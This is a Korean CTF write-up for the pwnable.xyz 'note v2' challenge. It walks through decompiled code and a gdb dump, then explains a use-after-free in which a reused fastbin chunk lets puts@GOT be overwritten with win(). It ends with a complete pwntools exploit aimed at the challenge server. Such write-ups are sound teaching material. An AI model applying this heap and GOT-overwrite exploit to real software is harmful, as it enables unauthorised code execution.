[pwnable.xyz] note v2 write up
해당 바이너리에는 아래와 같은 보안 기법이 적용되어 있다.
또한 아래 사진처럼 여러개의 사용자 정의 함수들의 존재하는 것을 볼 수 있다.
사용자 정의 함수들 중 아래 make_note() 함수를 보자.
기본적으로 0x28 만큼 공간을 할당하고, 사용자로 부터 크기를 입력받아 공간을 할당한다.
만약 *(addr + 0x20) 에 값이 들어가 있으면 공간을 할당 하지 않는다.
void make_note(){
if(count <= 0x20){
printf("size of note: ");
int tmp = read_int32();
long *addr = malloc(0x28);
if(*(addr + 0x20) == 0)
*(addr + 0x20) = malloc(tmp);
printf("title: ");
read(0, addr, 0x20);
printf("note: ");
read(0, *(addr + 0x20), tmp - 1);
*(book + count*8) = addr;
count++;
}
}
이때의 메모리 구조는 다음과 같다.
0x603260에는 title 값이 입력된다.
0x603280에는 note의 주소가 들어가고 해당 주소에는 note의 값이 들어간다.
gdb-peda$ x/10gx 0x603260
0x603260: 0x0000000a41414141 0x0000000000000000
0x603270: 0x0000000000000000 0x0000000000000000
0x603280: 0x0000000000603290 0x0000000000000021
0x603290: 0x0000000a42424242 0x0000000000000000
0x6032a0: 0x0000000000000000 0x0000000000020d61
만약 위 공간을 delete_note() 함수를 호출하여 free를 하게 되면 0x603280에 있는 주소가 free 된다.
free된 주소가 재사용 된다면 어떻게 될까?
void delete_note(){
long note = get_note();
if(note != 0){
free(*(note+0x20));
count--;
book[count*8] = 0;
}
}
1. make_note() 호출
note의 크기를 title과 같은 크기인 0x28(40)을 입력.
title값은 아무거나 적고, note 값을 입력할때 0x20 + 0x8(GOT addr) 로 입력.
2. delete_note() 호출
addr+0x20 의 주소가 free 되므로 청크의 크기가 0x28 인 공간이 free 됨.
3. make_note() 호출
title에 공간을 0x28 만큼 공간을 할당하는데, fastbin에 똑같은 크기의 청크가 free 되어 있어, 이 주소를 재사용함.
make_note() 함수중 아래 코드로 인해 addr+0x20에는 GOT addr 이 들어가 있으므로 공간 할당을 하지 않음.
if(*(addr + 0x20) == 0) // empty
*(addr + 0x20) = malloc(tmp);
note 값을 입력 할때 특정 GOT에 win 함수의 주소를 적음.
printf("note: ");
read(0, *(addr + 0x20), tmp - 1);
Payload
from pwn import *
p = remote("svc.pwnable.xyz", "30030")
e = ELF("./challenge")
def make_note(mode):
p.sendlineafter("> ", "1")
p.sendlineafter("size of note: ", "40")
p.sendlineafter("title: ", "A")
if mode == 0:
p.sendafter("note: ", "A"*0x20 + p32(e.got["puts"]))
else:
p.sendafter("note: ", p64(e.symbols["win"]))
def delete_note():
p.sendlineafter("> ", "3")
p.sendlineafter("Note#: ", "0")
make_note(0)
delete_note()
make_note(1)
p.sendlineafter("> ", "5")
p.interactive()